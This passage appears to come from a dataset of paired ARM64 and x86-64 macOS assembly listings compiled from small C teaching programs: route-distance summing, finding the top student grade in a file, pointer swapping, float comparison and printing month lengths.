.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sub sp, sp, #224
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-156]
sub x0, x29, #152
adrp x1, l___const.main.dist_rotas@PAGE
add x1, x1, l___const.main.dist_rotas@PAGEOFF
mov x2, #144
bl _memcpy
stur wzr, [x29, #-172]
sub sp, sp, #16
mov x9, sp
sub x8, x29, #160
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
add sp, sp, #16
ldur w8, [x29, #-160]
; kill: def $x8 killed $w8
mov x9, sp
stur x9, [x29, #-184]
lsl x9, x8, #2
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-216] ; 8-byte Folded Spill
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
ldur x10, [x29, #-216] ; 8-byte Folded Reload
mov x9, sp
subs x9, x9, x10
mov sp, x9
stur x9, [x29, #-208] ; 8-byte Folded Spill
stur x8, [x29, #-192]
stur wzr, [x29, #-164]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-164]
ldur w9, [x29, #-160]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-208] ; 8-byte Folded Reload
ldursw x9, [x29, #-164]
add x8, x8, x9, lsl #2
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
add sp, sp, #16
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-164]
add w8, w8, #1
stur w8, [x29, #-164]
b LBB0_1
LBB0_4:
stur wzr, [x29, #-164]
b LBB0_5
LBB0_5: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-164]
ldur w9, [x29, #-160]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_11
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
ldur x9, [x29, #-208] ; 8-byte Folded Reload
ldursw x8, [x29, #-164]
ldrsw x8, [x9, x8, lsl #2]
mov x10, #24
mul x10, x8, x10
sub x8, x29, #152
add x8, x8, x10
ldur w10, [x29, #-164]
add w10, w10, #1
ldrsw x9, [x9, w10, sxtw #2]
ldr w8, [x8, x9, lsl #2]
stur w8, [x29, #-168]
ldur w8, [x29, #-168]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
stur wzr, [x29, #-156]
mov w8, #1
stur w8, [x29, #-196]
b LBB0_12
LBB0_8: ; in Loop: Header=BB0_5 Depth=1
ldur x9, [x29, #-208] ; 8-byte Folded Reload
ldursw x8, [x29, #-164]
ldrsw x8, [x9, x8, lsl #2]
mov x10, #24
mul x10, x8, x10
sub x8, x29, #152
add x8, x8, x10
ldur w10, [x29, #-164]
add w10, w10, #1
ldrsw x9, [x9, w10, sxtw #2]
ldr w9, [x8, x9, lsl #2]
ldur w8, [x29, #-172]
add w8, w8, w9
stur w8, [x29, #-172]
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=1
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_5 Depth=1
ldur w8, [x29, #-164]
add w8, w8, #1
stur w8, [x29, #-164]
b LBB0_5
LBB0_11:
ldur w9, [x29, #-172]
; implicit-def: $x8
mov x8, x9
sub sp, sp, #16
mov x9, sp
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
add sp, sp, #16
stur wzr, [x29, #-156]
mov w8, #1
stur w8, [x29, #-196]
b LBB0_12
LBB0_12:
ldur x8, [x29, #-184]
mov sp, x8
ldur w8, [x29, #-156]
stur w8, [x29, #-220] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13:
bl ___stack_chk_fail
LBB0_14:
ldur w0, [x29, #-220] ; 4-byte Folded Reload
mov sp, x29
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.p2align 2 ; @__const.main.dist_rotas
l___const.main.dist_rotas:
.long 0 ; 0x0
.long 63 ; 0x3f
.long 210 ; 0xd2
.long 190 ; 0xbe
.long 4294967295 ; 0xffffffff
.long 190 ; 0xbe
.long 63 ; 0x3f
.long 0 ; 0x0
.long 160 ; 0xa0
.long 150 ; 0x96
.long 95 ; 0x5f
.long 10 ; 0xa
.long 210 ; 0xd2
.long 160 ; 0xa0
.long 0 ; 0x0
.long 10 ; 0xa
.long 1 ; 0x1
.long 10 ; 0xa
.long 190 ; 0xbe
.long 150 ; 0x96
.long 10 ; 0xa
.long 0 ; 0x0
.long 10 ; 0xa
.long 20 ; 0x14
.long 10 ; 0xa
.long 95 ; 0x5f
.long 7 ; 0x7
.long 21 ; 0x15
.long 0 ; 0x0
.long 80 ; 0x50
.long 190 ; 0xbe
.long 2 ; 0x2
.long 4294967295 ; 0xffffffff
.long 41 ; 0x29
.long 80 ; 0x50
.long 0 ; 0x0
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "rota invalida!\n"
l_.str.2: ; @.str.2
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -164(%rbp)
leaq l___const.main.dist_rotas(%rip), %rsi
leaq -160(%rbp), %rdi
movl $144, %edx
callq _memcpy
movl $0, -180(%rbp)
leaq L_.str(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
leaq -168(%rbp), %rsi
callq _scanf
movl -168(%rbp), %eax
## kill: def $rax killed $eax
movq %rax, -224(%rbp) ## 8-byte Spill
movq %rsp, %rcx
movq %rcx, -192(%rbp)
shlq $2, %rax
callq ____chkstk_darwin
addq $15, %rax
andq $-16, %rax
subq %rax, %rsp
movq -224(%rbp), %rax ## 8-byte Reload
movq %rsp, %rcx
movq %rcx, -216(%rbp) ## 8-byte Spill
movq %rax, -200(%rbp)
movl $0, -172(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -172(%rbp), %eax
cmpl -168(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -216(%rbp), %rsi ## 8-byte Reload
movslq -172(%rbp), %rax
shlq $2, %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -172(%rbp), %eax
addl $1, %eax
movl %eax, -172(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -172(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
movl -172(%rbp), %eax
movl -168(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jge LBB0_11
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movq -216(%rbp), %rcx ## 8-byte Reload
movslq -172(%rbp), %rax
movslq (%rcx,%rax,4), %rdx
leaq -160(%rbp), %rax
imulq $24, %rdx, %rdx
addq %rdx, %rax
movl -172(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
movslq (%rcx,%rdx,4), %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -176(%rbp)
cmpl $-1, -176(%rbp)
jg LBB0_8
## %bb.7:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -164(%rbp)
movl $1, -204(%rbp)
jmp LBB0_12
LBB0_8: ## in Loop: Header=BB0_5 Depth=1
movq -216(%rbp), %rcx ## 8-byte Reload
movslq -172(%rbp), %rax
movslq (%rcx,%rax,4), %rdx
leaq -160(%rbp), %rax
imulq $24, %rdx, %rdx
addq %rdx, %rax
movl -172(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
movslq (%rcx,%rdx,4), %rcx
movl (%rax,%rcx,4), %eax
addl -180(%rbp), %eax
movl %eax, -180(%rbp)
## %bb.9: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_10
LBB0_10: ## in Loop: Header=BB0_5 Depth=1
movl -172(%rbp), %eax
addl $1, %eax
movl %eax, -172(%rbp)
jmp LBB0_5
LBB0_11:
movl -180(%rbp), %esi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -164(%rbp)
movl $1, -204(%rbp)
LBB0_12:
movq -192(%rbp), %rax
movq %rax, %rsp
movl -164(%rbp), %eax
movl %eax, -228(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_14
## %bb.13:
movl -228(%rbp), %eax ## 4-byte Reload
movq %rbp, %rsp
popq %rbp
retq
LBB0_14:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__const
.p2align 4 ## @__const.main.dist_rotas
l___const.main.dist_rotas:
.long 0 ## 0x0
.long 63 ## 0x3f
.long 210 ## 0xd2
.long 190 ## 0xbe
.long 4294967295 ## 0xffffffff
.long 190 ## 0xbe
.long 63 ## 0x3f
.long 0 ## 0x0
.long 160 ## 0xa0
.long 150 ## 0x96
.long 95 ## 0x5f
.long 10 ## 0xa
.long 210 ## 0xd2
.long 160 ## 0xa0
.long 0 ## 0x0
.long 10 ## 0xa
.long 1 ## 0x1
.long 10 ## 0xa
.long 190 ## 0xbe
.long 150 ## 0x96
.long 10 ## 0xa
.long 0 ## 0x0
.long 10 ## 0xa
.long 20 ## 0x14
.long 10 ## 0xa
.long 95 ## 0x5f
.long 7 ## 0x7
.long 21 ## 0x15
.long 0 ## 0x0
.long 80 ## 0x50
.long 190 ## 0xbe
.long 2 ## 0x2
.long 4294967295 ## 0xffffffff
.long 41 ## 0x29
.long 80 ## 0x50
.long 0 ## 0x0
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "rota invalida!\n"
L_.str.2: ## @.str.2
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/62637709.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, _arquivo@GOTPAGE
ldr x8, [x8, _arquivo@GOTPAGEOFF]
str x8, [sp, #32] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-44]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
ldr x9, [sp, #32] ; 8-byte Folded Reload
mov x8, x0
str x8, [x9]
subs x8, x0, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-44]
b LBB0_8
LBB0_2:
b LBB0_3
LBB0_3: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
sub x8, x29, #24
str x8, [x9]
add x8, sp, #48
str x8, [x9, #8]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fscanf
adds w8, w0, #1
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
ldr s0, [sp, #48]
ldr s1, [sp, #44]
fcmp s0, s1
cset w8, le
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=1
ldr s0, [sp, #48]
str s0, [sp, #44]
sub x0, x29, #40
sub x1, x29, #24
mov x2, #16
bl ___strcpy_chk
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_3 Depth=1
b LBB0_3
LBB0_7:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #40
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _printf
ldr s0, [sp, #44]
fcvt d0, s0
mov x8, sp
str d0, [x8]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x0, [x8]
bl _fclose
stur wzr, [x29, #-44]
b LBB0_8
LBB0_8:
ldur w8, [x29, #-44]
str w8, [sp, #28] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9:
bl ___stack_chk_fail
LBB0_10:
ldr w0, [sp, #28] ; 4-byte Folded Reload
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "alunos.txt"
l_.str.1: ; @.str.1
.asciz "r"
.comm _arquivo,8,3 ; @arquivo
l_.str.2: ; @.str.2
.asciz "ERROR 101!\n"
l_.str.3: ; @.str.3
.asciz "NOME:%s NOTA:%f\n"
l_.str.4: ; @.str.4
.asciz "Aluno com maior nota:\n"
l_.str.5: ; @.str.5
.asciz "Nome: %s\n"
l_.str.6: ; @.str.6
.asciz "Nota: %.2f\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq _arquivo@GOTPCREL(%rip), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB0_2
## %bb.1:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -52(%rbp)
jmp LBB0_8
LBB0_2:
jmp LBB0_3
LBB0_3: ## =>This Inner Loop Header: Depth=1
movq _arquivo@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.3(%rip), %rsi
leaq -32(%rbp), %rdx
leaq -56(%rbp), %rcx
movb $0, %al
callq _fscanf
cmpl $-1, %eax
je LBB0_7
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -60(%rbp), %xmm0
jbe LBB0_6
## %bb.5: ## in Loop: Header=BB0_3 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
movss %xmm0, -60(%rbp)
leaq -48(%rbp), %rdi
leaq -32(%rbp), %rsi
movl $16, %edx
callq ___strcpy_chk
LBB0_6: ## in Loop: Header=BB0_3 Depth=1
jmp LBB0_3
LBB0_7:
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
leaq -48(%rbp), %rsi
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
movss -60(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
leaq L_.str.6(%rip), %rdi
movb $1, %al
callq _printf
movq _arquivo@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _fclose
movl $0, -52(%rbp)
LBB0_8:
movl -52(%rbp), %eax
movl %eax, -64(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_10
## %bb.9:
movl -64(%rbp), %eax ## 4-byte Reload
addq $64, %rsp
popq %rbp
retq
LBB0_10:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "alunos.txt"
L_.str.1: ## @.str.1
.asciz "r"
.comm _arquivo,8,3 ## @arquivo
L_.str.2: ## @.str.2
.asciz "ERROR 101!\n"
L_.str.3: ## @.str.3
.asciz "NOME:%s NOTA:%f\n"
L_.str.4: ## @.str.4
.asciz "Aluno com maior nota:\n"
L_.str.5: ## @.str.5
.asciz "Nome: %s\n"
L_.str.6: ## @.str.6
.asciz "Nota: %.2f\n"
.subsections_via_symbols
| the_stack_data/733080.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
stur w8, [x29, #-28] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
sub x8, x29, #16
str x8, [sp, #16] ; 8-byte Folded Spill
adrp x8, l_.str@PAGE
add x8, x8, l_.str@PAGEOFF
stur x8, [x29, #-16]
sub x8, x29, #24
str x8, [sp, #8] ; 8-byte Folded Spill
adrp x8, l_.str.1@PAGE
add x8, x8, l_.str.1@PAGEOFF
stur x8, [x29, #-24]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
str x0, [sp, #24] ; 8-byte Folded Spill
bl _printf
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
str x0, [sp, #32] ; 8-byte Folded Spill
bl _printf
ldur x8, [x29, #-24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
ldr x1, [sp, #8] ; 8-byte Folded Reload
ldr x0, [sp, #16] ; 8-byte Folded Reload
bl _swap_str_ptr
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _printf
ldr x0, [sp, #24] ; 8-byte Folded Reload
bl _printf
ldr x0, [sp, #32] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
mov x9, sp
str x8, [x9]
bl _printf
ldr x0, [sp, #40] ; 8-byte Folded Reload
ldur x8, [x29, #-24]
mov x9, sp
str x8, [x9]
bl _printf
ldur w0, [x29, #-28] ; 4-byte Folded Reload
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _swap_str_ptr ; -- Begin function swap_str_ptr
.p2align 2
_swap_str_ptr: ; @swap_str_ptr
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str x1, [sp, #16]
ldr x8, [sp, #24]
ldr x8, [x8]
str x8, [sp, #8]
ldr x8, [sp, #16]
ldr x8, [x8]
ldr x9, [sp, #24]
str x8, [x9]
ldr x8, [sp, #8]
ldr x9, [sp, #16]
str x8, [x9]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "hello"
l_.str.1: ; @.str.1
.asciz ", world!"
l_.str.2: ; @.str.2
.asciz "Before swap:\n"
l_.str.3: ; @.str.3
.asciz "============\n"
l_.str.4: ; @.str.4
.asciz "s1: %s\n"
l_.str.5: ; @.str.5
.asciz "s2: %s\n"
l_.str.6: ; @.str.6
.asciz "\nAfter swap:\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rax
movq %rax, -16(%rbp)
leaq L_.str.1(%rip), %rax
movq %rax, -24(%rbp)
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rsi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rsi
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
leaq -16(%rbp), %rdi
leaq -24(%rbp), %rsi
callq _swap_str_ptr
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rsi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rsi
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _swap_str_ptr ## -- Begin function swap_str_ptr
.p2align 4, 0x90
_swap_str_ptr: ## @swap_str_ptr
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rax
movq (%rax), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
movq (%rax), %rcx
movq -8(%rbp), %rax
movq %rcx, (%rax)
movq -24(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "hello"
L_.str.1: ## @.str.1
.asciz ", world!"
L_.str.2: ## @.str.2
.asciz "Before swap:\n"
L_.str.3: ## @.str.3
.asciz "============\n"
L_.str.4: ## @.str.4
.asciz "s1: %s\n"
L_.str.5: ## @.str.5
.asciz "s2: %s\n"
L_.str.6: ## @.str.6
.asciz "\nAfter swap:\n"
.subsections_via_symbols
| the_stack_data/1180954.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/20450260.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #12]
adrp x8, l___const.main.v@PAGE
add x8, x8, l___const.main.v@PAGEOFF
ldr q0, [x8]
str q0, [sp, #16]
ldr w8, [x8, #16]
str w8, [sp, #32]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldr s0, [sp, #16]
ldr s1, [sp, #16]
fcmp s0, s1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_2
LBB0_2:
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
bl ___stack_chk_fail
LBB0_4:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.p2align 2 ; @__const.main.v
l___const.main.v:
.long 0x40e00000 ; float 7
.long 0x41000000 ; float 8
.long 0x41180000 ; float 9.5
.long 0x411e6666 ; float 9.89999961
.long 0x40a66666 ; float 5.19999981
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "a ok \n\n"
l_.str.1: ; @.str.1
.asciz "b ok \n\n"
l_.str.2: ; @.str.2
.asciz "c ok \n\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -36(%rbp)
movq l___const.main.v(%rip), %rax
movq %rax, -32(%rbp)
movq l___const.main.v+8(%rip), %rax
movq %rax, -24(%rbp)
movl l___const.main.v+16(%rip), %eax
movl %eax, -16(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
ucomiss -32(%rbp), %xmm0
jne LBB0_2
jp LBB0_2
## %bb.1:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_2:
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_4
## %bb.3:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
LBB0_4:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__const
.p2align 4 ## @__const.main.v
l___const.main.v:
.long 0x40e00000 ## float 7
.long 0x41000000 ## float 8
.long 0x41180000 ## float 9.5
.long 0x411e6666 ## float 9.89999961
.long 0x40a66666 ## float 5.19999981
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "a ok \n\n"
L_.str.1: ## @.str.1
.asciz "b ok \n\n"
L_.str.2: ## @.str.2
.asciz "c ok \n\n"
.subsections_via_symbols
| the_stack_data/761155.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #20]
add x0, sp, #24
adrp x1, l___const.main.days@PAGE
add x1, x1, l___const.main.days@PAGEOFF
mov x2, #48
bl _memcpy
str wzr, [sp, #16]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #16]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #16]
add w11, w8, #1
ldrsw x9, [sp, #16]
add x8, sp, #24
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
; implicit-def: $x10
mov x10, x11
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB0_1
LBB0_4:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
